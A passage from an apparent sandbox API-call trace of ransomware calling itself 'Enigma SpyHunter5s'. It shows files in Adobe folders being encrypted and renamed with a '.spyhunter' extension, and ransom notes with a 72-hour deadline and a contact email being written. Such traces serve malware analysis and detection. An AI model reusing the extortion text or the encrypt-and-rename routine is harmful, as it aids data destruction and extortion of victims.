(in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0179.874] WriteFile (in: hFile=0xb0, lpBuffer=0x25ce2f4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x25ce2f4*, lpNumberOfBytesWritten=0x25ce2b4*=0x4, lpOverlapped=0x0) returned 1 [0179.874] WriteFile (in: hFile=0xb0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce2b4*=0x30, lpOverlapped=0x0) returned 1 [0179.874] CloseHandle (hObject=0xb0) returned 1 [0179.874] GetProcessHeap () returned 0x2c0000 [0179.874] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0179.874] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\da_DK\\Reader_10.0.helpcfg.spyhunter") returned 89 [0179.874] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\da_DK\\Reader_10.0.helpcfg" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\da_dk\\reader_10.0.helpcfg"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\da_DK\\Reader_10.0.helpcfg.spyhunter" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\da_dk\\reader_10.0.helpcfg.spyhunter")) returned 1 [0179.875] GetProcessHeap () returned 0x2c0000 [0179.875] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0179.875] GetProcessHeap () returned 0x2c0000 [0179.875] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0179.875] GetProcessHeap () returned 0x2c0000 [0179.875] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e74098 | out: hHeap=0x2c0000) returned 1 [0179.875] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\cs_CZ\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\cs_cz\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0179.876] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0179.876] WriteFile (in: hFile=0xb0, lpBuffer=0x25ce22b*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25ce354, lpOverlapped=0x0 | out: lpBuffer=0x25ce22b*, lpNumberOfBytesWritten=0x25ce354*=0x127, lpOverlapped=0x0) returned 1 [0179.876] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0179.876] WriteFile (in: hFile=0xb0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25ce354, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25ce354*=0x2ac, lpOverlapped=0x0) returned 1 [0179.877] CloseHandle (hObject=0xb0) returned 1 [0179.877] GetProcessHeap () returned 0x2c0000 [0179.877] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e73fb0 | out: hHeap=0x2c0000) returned 1 [0179.877] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce2f0 | out: pbBuffer=0x25ce2f0) returned 1 [0179.877] GetProcessHeap () returned 0x2c0000 [0179.877] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0179.877] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce2e8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce2e8*=0x30) returned 1 [0179.877] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\cs_CZ\\Reader_10.0.helpcfg" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\cs_cz\\reader_10.0.helpcfg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0179.878] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\cs_CZ\\Reader_10.0.helpcfg") returned 79 [0179.878] StrStrW (lpFirst="Reader_10.0.helpcfg", lpSrch=".txt") returned 0x0 [0179.878] GetProcessHeap () returned 0x2c0000 [0179.878] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0179.878] ReadFile (in: hFile=0xb0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce2ac, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25ce2ac*=0x15d, lpOverlapped=0x0) returned 1 [0179.878] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xfffffea3, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0179.878] WriteFile (in: hFile=0xb0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x15d, lpNumberOfBytesWritten=0x25ce2ac, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25ce2ac*=0x15d, lpOverlapped=0x0) returned 1 [0179.879] GetProcessHeap () returned 0x2c0000 [0179.879] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0179.879] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0179.879] WriteFile (in: hFile=0xb0, lpBuffer=0x25ce2ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce2ac, lpOverlapped=0x0 | out: lpBuffer=0x25ce2ec*, lpNumberOfBytesWritten=0x25ce2ac*=0x4, lpOverlapped=0x0) returned 1 [0179.879] WriteFile (in: hFile=0xb0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce2ac, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce2ac*=0x30, lpOverlapped=0x0) returned 1 [0179.879] CloseHandle (hObject=0xb0) returned 1 [0179.879] GetProcessHeap () returned 0x2c0000 [0179.879] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0179.879] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\cs_CZ\\Reader_10.0.helpcfg.spyhunter") returned 89 [0179.879] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\cs_CZ\\Reader_10.0.helpcfg" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\cs_cz\\reader_10.0.helpcfg"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\cs_CZ\\Reader_10.0.helpcfg.spyhunter" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\cs_cz\\reader_10.0.helpcfg.spyhunter")) returned 1 [0179.880] GetProcessHeap () returned 0x2c0000 [0179.880] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0179.880] GetProcessHeap () returned 0x2c0000 [0179.880] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0179.880] GetProcessHeap () returned 0x2c0000 [0179.880] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e73ec8 | out: hHeap=0x2c0000) returned 1 [0179.880] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ca_ES\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\ca_es\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0179.881] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0179.881] WriteFile (in: hFile=0xb0, lpBuffer=0x25ce223*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25ce34c, lpOverlapped=0x0 | out: lpBuffer=0x25ce223*, lpNumberOfBytesWritten=0x25ce34c*=0x127, lpOverlapped=0x0) returned 1 [0179.882] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0179.882] WriteFile (in: hFile=0xb0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25ce34c, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25ce34c*=0x2ac, lpOverlapped=0x0) returned 1 [0179.882] CloseHandle (hObject=0xb0) returned 1 [0179.882] GetProcessHeap () returned 0x2c0000 [0179.882] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e73de0 | out: hHeap=0x2c0000) returned 1 [0179.882] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce2e8 | out: pbBuffer=0x25ce2e8) returned 1 [0179.882] GetProcessHeap () returned 0x2c0000 [0179.882] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0179.883] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce2e0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce2e0*=0x30) returned 1 [0179.883] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ca_ES\\Reader_10.0.helpcfg" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\ca_es\\reader_10.0.helpcfg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0179.883] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ca_ES\\Reader_10.0.helpcfg") returned 79 [0179.883] StrStrW (lpFirst="Reader_10.0.helpcfg", lpSrch=".txt") returned 0x0 [0179.883] GetProcessHeap () returned 0x2c0000 [0179.883] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0179.883] ReadFile (in: hFile=0xb0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce2a4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25ce2a4*=0x15d, lpOverlapped=0x0) returned 1 [0179.884] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xfffffea3, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0179.884] WriteFile (in: hFile=0xb0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x15d, lpNumberOfBytesWritten=0x25ce2a4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25ce2a4*=0x15d, lpOverlapped=0x0) returned 1 [0179.884] GetProcessHeap () returned 0x2c0000 [0179.884] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0179.884] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0179.884] WriteFile (in: hFile=0xb0, lpBuffer=0x25ce2e4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce2a4, lpOverlapped=0x0 | out: lpBuffer=0x25ce2e4*, lpNumberOfBytesWritten=0x25ce2a4*=0x4, lpOverlapped=0x0) returned 1 [0179.884] WriteFile (in: hFile=0xb0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce2a4, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce2a4*=0x30, lpOverlapped=0x0) returned 1 [0179.885] CloseHandle (hObject=0xb0) returned 1 [0179.885] GetProcessHeap () returned 0x2c0000 [0179.885] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0179.885] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ca_ES\\Reader_10.0.helpcfg.spyhunter") returned 89 [0179.885] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ca_ES\\Reader_10.0.helpcfg" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\ca_es\\reader_10.0.helpcfg"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ca_ES\\Reader_10.0.helpcfg.spyhunter" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\ca_es\\reader_10.0.helpcfg.spyhunter")) returned 1 [0179.886] GetProcessHeap () returned 0x2c0000 [0179.886] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0179.886] GetProcessHeap () returned 0x2c0000 [0179.886] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0179.886] GetProcessHeap () returned 0x2c0000 [0179.886] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e73c10 | out: hHeap=0x2c0000) returned 1 [0179.886] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce2e8 | out: pbBuffer=0x25ce2e8) returned 1 [0179.886] GetProcessHeap () returned 0x2c0000 [0179.886] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0179.886] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce2e0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce2e0*=0x30) returned 1 [0179.886] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\1.0\\AdobeARM.exe" (normalized: "c:\\program files (x86)\\common files\\adobe\\arm\\1.0\\adobearm.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0179.887] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\1.0\\AdobeARM.exe") returned 66 [0179.887] StrStrW (lpFirst="AdobeARM.exe", lpSrch=".txt") returned 0x0 [0179.887] GetProcessHeap () returned 0x2c0000 [0179.887] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0179.887] ReadFile (in: hFile=0xb0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce2a4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25ce2a4*=0x2800, lpOverlapped=0x0) returned 1 [0179.898] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0179.898] WriteFile (in: hFile=0xb0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25ce2a4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25ce2a4*=0x2800, lpOverlapped=0x0) returned 1 [0179.898] GetProcessHeap () returned 0x2c0000 [0179.898] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0179.898] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0179.898] WriteFile (in: hFile=0xb0, lpBuffer=0x25ce2e4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce2a4, lpOverlapped=0x0 | out: lpBuffer=0x25ce2e4*, lpNumberOfBytesWritten=0x25ce2a4*=0x4, lpOverlapped=0x0) returned 1 [0179.971] WriteFile (in: hFile=0xb0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce2a4, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce2a4*=0x30, lpOverlapped=0x0) returned 1 [0179.971] CloseHandle (hObject=0xb0) returned 1 [0179.971] GetProcessHeap () returned 0x2c0000 [0179.971] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0179.971] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\1.0\\AdobeARM.exe.spyhunter") returned 76 [0179.972] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\1.0\\AdobeARM.exe" (normalized: "c:\\program files (x86)\\common files\\adobe\\arm\\1.0\\adobearm.exe"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\1.0\\AdobeARM.exe.spyhunter" (normalized: "c:\\program files (x86)\\common files\\adobe\\arm\\1.0\\adobearm.exe.spyhunter")) returned 1 [0179.975] GetProcessHeap () returned 0x2c0000 [0179.975] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0179.975] GetProcessHeap () returned 0x2c0000 [0179.975] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0179.975] GetProcessHeap () returned 0x2c0000 [0179.975] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e03268 | out: hHeap=0x2c0000) returned 1 [0179.975] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce2e0 | out: pbBuffer=0x25ce2e0) returned 1 [0179.975] GetProcessHeap () returned 0x2c0000 [0179.975] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0179.975] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce2d8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce2d8*=0x30) returned 1 [0179.975] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.SLV" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\acropdf.slv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0179.975] GetProcessHeap () returned 0x2c0000 [0179.975] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0179.976] GetProcessHeap () returned 0x2c0000 [0179.976] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e64c80 | out: hHeap=0x2c0000) returned 1 [0179.976] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce2e0 | out: pbBuffer=0x25ce2e0) returned 1 [0179.976] GetProcessHeap () returned 0x2c0000 [0179.976] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0179.976] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce2d8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce2d8*=0x30) returned 1 [0179.976] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.SKY" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\acropdf.sky"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0179.976] GetProcessHeap () returned 0x2c0000 [0179.976] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0179.976] GetProcessHeap () returned 0x2c0000 [0179.976] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e64ba0 | out: hHeap=0x2c0000) returned 1 [0179.976] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce2d8 | out: pbBuffer=0x25ce2d8) returned 1 [0179.976] GetProcessHeap () returned 0x2c0000 [0179.976] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0179.976] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce2d0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce2d0*=0x30) returned 1 [0179.976] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.RUS" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\acropdf.rus"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0179.979] GetProcessHeap () returned 0x2c0000 [0179.979] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0179.979] GetProcessHeap () returned 0x2c0000 [0179.979] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e64ac0 | out: hHeap=0x2c0000) returned 1 [0179.979] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce2d8 | out: pbBuffer=0x25ce2d8) returned 1 [0179.979] GetProcessHeap () returned 0x2c0000 [0179.979] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0179.979] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce2d0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce2d0*=0x30) returned 1 [0179.979] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.POL" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\acropdf.pol"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0179.979] GetProcessHeap () returned 0x2c0000 [0179.979] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0179.979] GetProcessHeap () returned 0x2c0000 [0179.979] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e64820 | out: hHeap=0x2c0000) returned 1 [0179.979] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce2d0 | out: pbBuffer=0x25ce2d0) returned 1 [0179.979] GetProcessHeap () returned 0x2c0000 [0179.979] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0179.979] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce2c8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce2c8*=0x30) returned 1 [0179.980] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.NOR" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\acropdf.nor"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0179.983] GetProcessHeap () returned 0x2c0000 [0179.983] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0179.983] GetProcessHeap () returned 0x2c0000 [0179.983] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e64740 | out: hHeap=0x2c0000) returned 1 [0179.983] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce2d0 | out: pbBuffer=0x25ce2d0) returned 1 [0179.983] GetProcessHeap () returned 